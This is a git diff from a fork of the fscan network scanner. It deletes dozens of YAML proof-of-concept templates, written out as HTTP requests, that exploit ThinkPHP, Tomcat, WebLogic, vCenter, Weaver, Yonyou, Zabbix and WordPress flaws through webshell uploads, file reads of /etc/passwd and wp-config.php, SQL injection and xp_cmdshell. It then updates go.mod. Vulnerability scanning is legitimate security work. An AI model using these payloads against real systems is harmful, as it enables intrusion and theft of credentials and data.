- path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B"
- expression: "true"
- - method: GET
- path: "/{{r}}.php"
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(r1)))
-
-detail:
- author: violin
- ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2
- links:
- - https://www.freebuf.com/vuls/217586.html
diff --git a/WebScan/pocs/thinkphp-v6-file-write.yml b/WebScan/pocs/thinkphp-v6-file-write.yml
deleted file mode 100644
index 8346f40..0000000
--- a/WebScan/pocs/thinkphp-v6-file-write.yml
+++ /dev/null
@@ -1,26 +0,0 @@
-name: poc-yaml-thinkphp-v6-file-write
-set:
- f1: randomInt(800000000, 900000000)
-rules:
- - method: GET
- path: /{{f1}}.php
- follow_redirects: true
- expression: |
- response.status == 404
- - method: GET
- path: /
- headers:
- Cookie: PHPSESSID=../../../../public/{{f1}}.php
- follow_redirects: true
- expression: |
- response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1))
- - method: GET
- path: /{{f1}}.php
- follow_redirects: true
- expression: |
- response.status == 200 && response.content_type.contains("text/html")
-detail:
- author: Loneyer
- Affected Version: "Thinkphp 6.0.0"
- links:
- - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
diff --git a/WebScan/pocs/thinkphp5-controller-rce.yml b/WebScan/pocs/thinkphp5-controller-rce.yml
deleted file mode 100644
index c0ddd62..0000000
--- a/WebScan/pocs/thinkphp5-controller-rce.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-thinkphp5-controller-rce
-rules:
- - method: GET
- path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
- expression: |
- response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129")
-
-detail:
- links:
- - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce
\ No newline at end of file
diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml
deleted file mode 100644
index d24987b..0000000
--- a/WebScan/pocs/thinkphp5023-method-rce.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-thinkphp5023-method-rce
-rules:
- - method: POST
- path: /index.php?s=captcha
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1
- expression: |
- response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1")
-detail:
- links:
- - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
\ No newline at end of file
diff --git a/WebScan/pocs/tianqing-info-leak.yml b/WebScan/pocs/tianqing-info-leak.yml
deleted file mode 100644
index 6bf6789..0000000
--- a/WebScan/pocs/tianqing-info-leak.yml
+++ /dev/null
@@ -1,9 +0,0 @@
-name: poc-yaml-tianqing-info-leak
-rules:
- - method: GET
- path: /api/dbstat/gettablessize
- expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name")
-detail:
- author: jingling(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
\ No newline at end of file
diff --git a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml b/WebScan/pocs/tomcat-cve-2017-12615-rce.yml
deleted file mode 100644
index dc1fdf7..0000000
--- a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-name: poc-yaml-tomcat-cve-2017-12615-rce
-set:
- filename: randomLowercase(6)
- verifyStr: randomLowercase(12)
- commentStr: randomLowercase(12)
-rules:
- - method: PUT
- path: '/{{filename}}.jsp/'
- body: '{{verifyStr}} <%-- {{commentStr}} --%>'
- follow_redirects: false
- expression: |
- response.status == 201
- - method: GET
- path: '/{{filename}}.jsp'
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr))
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://www.seebug.org/vuldb/ssvid-96562
- - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA
diff --git a/WebScan/pocs/tomcat-cve-2018-11759.yml b/WebScan/pocs/tomcat-cve-2018-11759.yml
deleted file mode 100644
index 7ab73aa..0000000
--- a/WebScan/pocs/tomcat-cve-2018-11759.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-tomcat-cve-2018-11759
-rules:
- - method: GET
- path: /jkstatus;
- follow_redirects: false
- expression: |
- response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body)
- - method: GET
- path: /jkstatus;?cmd=dump
- follow_redirects: false
- expression: |
- response.status == 200 && "ServerRoot=*".bmatches(response.body)
-detail:
- author: loneyer
- links:
- - https://github.com/immunIT/CVE-2018-11759
diff --git a/WebScan/pocs/tomcat-manager-weak.yml b/WebScan/pocs/tomcat-manager-weak.yml
deleted file mode 100644
index b167851..0000000
--- a/WebScan/pocs/tomcat-manager-weak.yml
+++ /dev/null
@@ -1,31 +0,0 @@
-name: poc-yaml-tomcat-manager-weak
-sets:
- username:
- - tomcat
- - admin
- - root
- - manager
- password:
- - ""
- - admin
- - tomcat
- - 123456
- - root
- payload:
- - base64(username+":"+password)
-rules:
- - method: GET
- path: /manager/html
- follow_redirects: false
- expression: |
- response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager")
- - method: GET
- path: /manager/html
- headers:
- Authorization: Basic {{payload}}
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager")
-detail:
- author: shadown1ng(https://github.com/shadown1ng)
-
diff --git a/WebScan/pocs/tongda-meeting-unauthorized-access.yml b/WebScan/pocs/tongda-meeting-unauthorized-access.yml
deleted file mode 100644
index b7e4e5c..0000000
--- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-tongda-meeting-unauthorized-access
-rules:
- - method: GET
- path: >-
- /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay
- headers:
- User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
- Accept-Encoding: 'deflate'
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle")))
-detail:
- author: 清风明月(www.secbook.info)
- influence_version: ' < 通达OA 11.5'
- links:
- - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA
diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml
deleted file mode 100644
index 05768d9..0000000
--- a/WebScan/pocs/tongda-user-session-disclosure.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-tongda-user-session-disclosure
-rules:
- - method: GET
- path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
- follow_redirects: false
- expression: "true"
-
- - method: POST
- path: /general/userinfo.php?UID=1
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
-detail:
- author: kzaopa(https://github.com/kzaopa)
- links:
- - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
\ No newline at end of file
diff --git a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml b/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml
deleted file mode 100644
index 19b9ba6..0000000
--- a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-ueditor-cnvd-2017-20077-file-upload
-rules:
- - method: GET
- path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
- headers:
- Accept-Encoding: 'deflate'
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
-detail:
- author: 清风明月(www.secbook.info)
- influence_version: 'UEditor v1.4.3.3'
- links:
- - https://zhuanlan.zhihu.com/p/85265552
- - https://www.freebuf.com/vuls/181814.html
- exploit: >-
- http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
diff --git a/WebScan/pocs/vengd-upload-rce.yml b/WebScan/pocs/vengd-upload-rce.yml
deleted file mode 100644
index deaec2f..0000000
--- a/WebScan/pocs/vengd-upload-rce.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-vengd-upload-rce
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
- r3: randomInt(40000, 44800)
- r4: randomInt(40000, 44800)
-rules:
- - method: POST
- path: /Upload/upload_file.php?l={{r1}}
- headers:
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
- body: |-
- ------WebKitFormBoundaryfcKRltGv
- Content-Disposition: form-data; name="file"; filename="{{r2}}.php"
- Content-Type: image/avif
-
- ------WebKitFormBoundaryfcKRltGv--
- expression: response.status == 200 && response.body.bcontains(b"_Request:")
- - method: GET
- path: '/Upload/{{r1}}/{{r2}}.php'
- expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4)))
-detail:
- author: jingling(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
\ No newline at end of file
diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml
deleted file mode 100644
index a32c5c2..0000000
--- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-vmware-vcenter-arbitrary-file-read
-rules:
- - method: GET
- path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
-detail:
- author: MrP01ntSun(https://github.com/MrPointSun)
- links:
- - https://t.co/LfvbyBUhF5
diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml
deleted file mode 100644
index 064aa10..0000000
--- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-vmware-vcenter-arbitrary-file-read2
-rules:
- - method: GET
- path: /eam/vib?id=/etc/passwd
- follow_redirects: false
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: MrP01ntSun(https://github.com/MrPointSun)
- links:
- - https://t.co/LfvbyBUhF5
diff --git a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
deleted file mode 100644
index 6d3b795..0000000
--- a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
-rules:
- - method: POST
- path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
- headers:
- Content-Type: application/json
- body: |-
- {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
- expression: |
- response.status == 200 && response.body.bcontains(b"result")
-detail:
- vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
- author: envone77
- description: "vmware vCenter unauth RCE cve-2021-21985"
- links:
- - https://www.anquanke.com/post/id/243098
- - https://github.com/alt3kx/CVE-2021-21985_PoC
\ No newline at end of file
diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
deleted file mode 100644
index c2ed9a9..0000000
--- a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
-rules:
- - method: GET
- path: /ui/vropspluginui/rest/services/uploadova
- follow_redirects: false
- expression: |
- response.status == 405 && response.body.bcontains(b"Method Not Allowed")
- - method: GET
- path: /ui/vropspluginui/rest/services/getstatus
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress")
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://swarm.ptsecurity.com/unauth-rce-vmware/
\ No newline at end of file
diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml
deleted file mode 100644
index 6b27d65..0000000
--- a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
-rules:
- - method: POST
- path: /casa/nodes/thumbprints
- headers:
- Content-Type: application/json
- body: |
- ["127.0.0.1:443/ui/"]
- follow_redirects: true
- expression: |
- response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
-detail:
- author: Loneyer
- links:
- - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
\ No newline at end of file
diff --git a/WebScan/pocs/weaver-ebridge-file-read-linux.yml b/WebScan/pocs/weaver-ebridge-file-read-linux.yml
deleted file mode 100644
index 47d9379..0000000
--- a/WebScan/pocs/weaver-ebridge-file-read-linux.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-weaver-ebridge-file-read-linux
-rules:
- - method: GET
- path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
- search: |
- \"id\"\:\"(?P.+?)\"\,
- - method: GET
- path: "/file/fileNoLogin/{{var}}"
- follow_redirects: false
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: mvhz81
- info: e-bridge-file-read for Linux
- links:
- - https://mrxn.net/Infiltration/323.html
diff --git a/WebScan/pocs/weaver-ebridge-file-read-windows.yml b/WebScan/pocs/weaver-ebridge-file-read-windows.yml
deleted file mode 100644
index cb06435..0000000
--- a/WebScan/pocs/weaver-ebridge-file-read-windows.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-weaver-ebridge-file-read-windows
-rules:
- - method: GET
- path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
- search: |
- \"id\"\:\"(?P.+?)\"\,
- - method: GET
- path: /file/fileNoLogin/{{var}}
- follow_redirects: false
- expression: |
- response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
-detail:
- author: mvhz81
- info: e-bridge-file-read for windows
- links:
- - https://mrxn.net/Infiltration/323.html
diff --git a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml b/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml
deleted file mode 100644
index f37b591..0000000
--- a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-name: poc-yaml-weaver-oa-arbitrary-file-upload
-set:
- r1: randomLowercase(4)
- r2: randomInt(40000, 44800)
- r3: randomInt(40000, 44800)
-rules:
- - method: POST
- path: /page/exportImport/uploadOperation.jsp
- headers:
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
- body: |-
- ------WebKitFormBoundaryFy3iNVBftjP6IOwo
- Content-Disposition: form-data; name="file"; filename="{{r1}}.jsp"
- Content-Type: application/octet-stream
- <%out.print({{r2}} * {{r3}});%>
- ------WebKitFormBoundaryFy3iNVBftjP6IOwo--
- expression: response.status == 200
- - method: GET
- path: '/page/exportImport/fileTransfer/{{r1}}.jsp'
- expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
-detail:
- author: jingling(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
\ No newline at end of file
diff --git a/WebScan/pocs/weblogic-cve-2020-14750.yml b/WebScan/pocs/weblogic-cve-2020-14750.yml
deleted file mode 100644
index 8db8464..0000000
--- a/WebScan/pocs/weblogic-cve-2020-14750.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-weblogic-cve-2020-14750
-rules:
- - method: GET
- path: /console/images/%252E./console.portal
- follow_redirects: false
- expression: |
- (response.status == 302 && response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console.portal?_nfpb=true")))
-detail:
- author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless)
- weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
- links:
- - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
diff --git a/WebScan/pocs/weblogic-ssrf.yml b/WebScan/pocs/weblogic-ssrf.yml
deleted file mode 100644
index 1c84c1c..0000000
--- a/WebScan/pocs/weblogic-ssrf.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-weblogic-ssrf
-rules:
- - method: GET
- path: >-
- /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700
- headers:
- Cookie: >-
- publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|;
- follow_redirects: false
- expression: >-
- response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed"))
diff --git a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml b/WebScan/pocs/weblogic-v10-cve-2017-10271.yml
deleted file mode 100644
index 1468f14..0000000
--- a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-weblogic-cve-2017-10271 # nolint[:namematch]
-rules:
- - method: POST
- path: /wls-wsat/CoordinatorPortType
- headers:
- Content-Type: text/xml
- body: >-
- 505053555551485749
- follow_redirects: true
- expression: >
- response.body.bcontains(b"225773091")
-detail:
- vulnpath: '/wls-wsat/CoordinatorPortType'
- author: fnmsd(https://github.com/fnmsd)
- description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271'
- weblogic_version: '10'
- links:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
- - https://github.com/QAX-A-Team/WeblogicEnvironment
- - https://xz.aliyun.com/t/5299
\ No newline at end of file
diff --git a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml b/WebScan/pocs/weblogic-v12-cve-2019-2725.yml
deleted file mode 100644
index 176adae..0000000
--- a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch]
-rules:
- - method: POST
- path: /wls-wsat/CoordinatorPortType
- headers:
- Content-Type: text/xml
- body: >-
- fffhelloorg.slf4j.ext.EventDataconnectionHandlertrue505053555551485749]]>
- follow_redirects: true
- expression: >
- response.body.bcontains(b"225773091")
-detail:
- vulnpath: '/wls-wsat/CoordinatorPortType'
- author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166)
- description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData'
- weblogic_version: '>12'
- links:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
- - https://github.com/QAX-A-Team/WeblogicEnvironment
- - https://xz.aliyun.com/t/5299
\ No newline at end of file
diff --git a/WebScan/pocs/webmin-cve-2019-15107-rce.yml b/WebScan/pocs/webmin-cve-2019-15107-rce.yml
deleted file mode 100644
index 9a7a1ce..0000000
--- a/WebScan/pocs/webmin-cve-2019-15107-rce.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-name: poc-yaml-webmin-cve-2019-15107-rce
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- - method: POST
- path: /password_change.cgi
- headers:
- Referer: "{{url}}"
- body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2
- follow_redirects: false
- expression: >
- response.body.bcontains(bytes(string(r1 + r2)))
-detail:
- author: danta
- description: Webmin 远程命令执行漏洞(CVE-2019-15107)
- links:
- - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml
deleted file mode 100644
index 5d75468..0000000
--- a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-wordpress-cve-2019-19985-infoleak
-rules:
- - method: GET
- path: "/wp-admin/admin.php?page=download_report&report=users&status=all"
- follow_redirects: false
- expression: >
- response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"]))
-detail:
- author: bufsnake(https://github.com/bufsnake)
- links:
- - https://www.exploit-db.com/exploits/48698
diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml
deleted file mode 100644
index a26f05d..0000000
--- a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-wordpress-ext-adaptive-images-lfi
-rules:
- - method: GET
- path: >-
- /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
- follow_redirects: false
- expression: >
- response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST")
-detail:
- author: FiveAourThe(https://github.com/FiveAourThe)
- links:
- - https://www.anquanke.com/vul/id/1674598
- - https://github.com/security-kma/EXPLOITING-CVE-2019-14205
diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml
deleted file mode 100644
index 523b0f2..0000000
--- a/WebScan/pocs/wordpress-ext-mailpress-rce.yml
+++ /dev/null
@@ -1,23 +0,0 @@ -name: poc-yaml-wordpress-ext-mailpress-rce -set: - r: randomInt(800000000, 1000000000) - r1: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/wp-content/plugins/mailpress/mp-includes/action.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 - expression: "true" - search: | - XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml deleted file mode 100644 index 5fd8452..0000000 --- a/WebScan/pocs/yonyou-grp-u8-sqli.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-yonyou-grp-u8-sqli -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /Proxy - body: > - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file 
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml deleted file mode 100644 index 8e6b75e..0000000 --- a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-yonyou-nc-arbitrary-file-upload -set: - r1: randomInt(10000, 20000) - r2: randomInt(1000000000, 2000000000) - r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" - r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" -rules: - - method: POST - path: /servlet/FileReceiveServlet - headers: - Content-Type: multipart/form-data; - body: >- - {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - expression: | - response.status == 200 - - method: GET - path: '/{{r1}}.jsp' - headers: - Content-Type: application/x-www-form-urlencoded - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r2))) -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "YONYOU NC > 6.5" - links: - - https://blog.csdn.net/weixin_44578334/article/details/110917053 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-authentication-bypass.yml b/WebScan/pocs/zabbix-authentication-bypass.yml deleted file mode 100644 index 1cc08ab..0000000 --- a/WebScan/pocs/zabbix-authentication-bypass.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-zabbix-authentication-bypass -rules: - - method: GET - path: /zabbix.php?action=dashboard.view&dashboardid=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.exploit-db.com/exploits/47467 \ No newline at end of file 
diff --git a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml b/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml deleted file mode 100644 index 494acc6..0000000 --- a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-zabbix-cve-2016-10134-sqli -set: - r: randomInt(2000000000, 2100000000) -rules: - - method: GET - path: >- - /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) -detail: - author: sharecast - links: - - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 \ No newline at end of file diff --git a/go.mod b/go.mod index b09342a..87b2ac7 100644 --- a/go.mod +++ b/go.mod @@ -1,19 +1,20 @@ -module github.com/shadow1ng/fscan +module github.com/timwhitez/fscan go 1.16 require ( github.com/denisenkom/go-mssqldb v0.10.0 github.com/go-sql-driver/mysql v1.6.0 - github.com/golang/protobuf v1.3.4 - github.com/google/cel-go v0.6.0 + github.com/golang/protobuf v1.5.2 + github.com/google/cel-go v0.7.3 github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 - github.com/lib/pq v1.10.1 + github.com/lib/pq v1.10.2 github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca + github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 - golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de - golang.org/x/net v0.0.0-20200301022130-244492dfa37a - golang.org/x/text v0.3.2 - google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 + golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 + golang.org/x/net v0.0.0-20210716203947-853a461950ff + golang.org/x/text v0.3.6 + google.golang.org/genproto 